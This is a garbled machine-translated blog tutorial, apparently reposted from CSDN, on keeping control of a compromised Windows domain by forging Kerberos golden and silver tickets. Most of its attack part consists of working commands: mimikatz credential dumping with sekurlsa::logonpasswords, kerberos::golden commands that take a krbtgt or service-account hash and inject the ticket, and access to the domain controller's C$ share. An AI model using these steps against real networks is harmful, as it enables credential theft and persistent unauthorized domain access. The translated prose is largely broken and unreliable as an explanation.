制御方式を維持するための一般的なドメインのドメイン権限での普及 - ネットワークの浸透

序文

私たちは、ドメインアカウントのパスワードの制御を取得した後、パスワードが変更されないようにするには、私たちが作ってきたことを、ドメインコントローラの特権を維持するための権限を維持する必要があります

特定のドメインコントローラアカウントのパスワードジャンプ方法を取得するにはここをクリック

メモドメイン検証プロセス

1.まず、サーバASにプレーンテキストのパスワード、サーバは、私たちに与えたTGT AS
2.サーバーTGS、TGSサーバは、私たちに与えたSTのアクセスにTGTを取った
対応するサービスへのアクセスを得るために3. STを

制御を維持するためにドメイン権限 - ゴールド注意事項

入門

Ms14068の脆弱性原理は、ドメイン管TGTを偽造し、法案の原則の脆弱性が偽造金のkrbtgtユーザーの法案で、KRBTGTユーザードメインは、ユーザーの発行チケットを管理するために使用され、ユーザーの許可、することができます偽のシステムと任意のユーザ

前提

MS-14から068に成功した後、偽造手形

プロセス

ドメイン名の取得1.:.COMをプラスあなたはwhoamiを後に得ることができます


2.ドメインのSID値を取得します(最終の除去 - 4一般ユーザー領域は、SIDのUIDです)

whoami /all

3.ドメインアカウントKRBTGT NTLMパスワードハッシュ値またはAES-256取得し
、エクスポートドメインのハッシュに表示14068偽造手形をここでジャンプをクリックしてください

4.クリーン全ての紙幣

klist purge

5.ユーザがmimikatz偽造ノートを指定してメモリ内に注入します

kerberos::golden  /admin:要伪造的用户名  /domain:域名  /sid:写sid  /krbtgt:写krbtgt的hash值  /ptt

リモート6.直接接続

dir \\dc\c$

ドメイン制御を維持する権限 - シルバーノート

入門

銀法案は偽造ST(チケット)である一方、法案の原理にシルバーとゴールドms14068法案は、同じ、ms14068金ノートがある偽造TGT(チケット発行されたチケット)ではありません、この利点は、KDC後にチケットがないので、より多くのなどCIFS(ファイル共有サービス)、MSSQL、WinRMの(Windowsリモート管理)、DNS、としてのみのサービスの仕事の一部に隠された、しかし、偽造チケット、

前提

MS-14から068に成功した後、偽造手形

利用

ドメイン名の取得1.:.COMをプラスあなたはwhoamiを後に得ることができます

2.取得ドメインSID(最終の除去 - 4一般ユーザー領域は、SIDのUIDです)

whoami /all

ターゲットサーバFQDNを攻撃するには、Get 3.

net time /domain    获取域控名

4.ファイル共有サービスのCIFSを使用して、サービスへのアクセスはNTMLHASHアカウント
ms14068に基づいて(ドメインコントローラ名$はサービスアカウントです)mimikatzクロールパスワードを使用

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >2.txt

5.偽のユーザー名を検索するには

net user /domain

全ての紙幣アップ6.クリーン

klist purge

メモリ注射を指定7. mimikatz偽造手形及びユーザー

kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt

リモートDCに直接接続した後、8

dir \\dc\c$

公開された66元の記事 ウォンの賞賛234 ・は 30000 +を見て

おすすめ

転載: blog.csdn.net/wsnbbz/article/details/105286840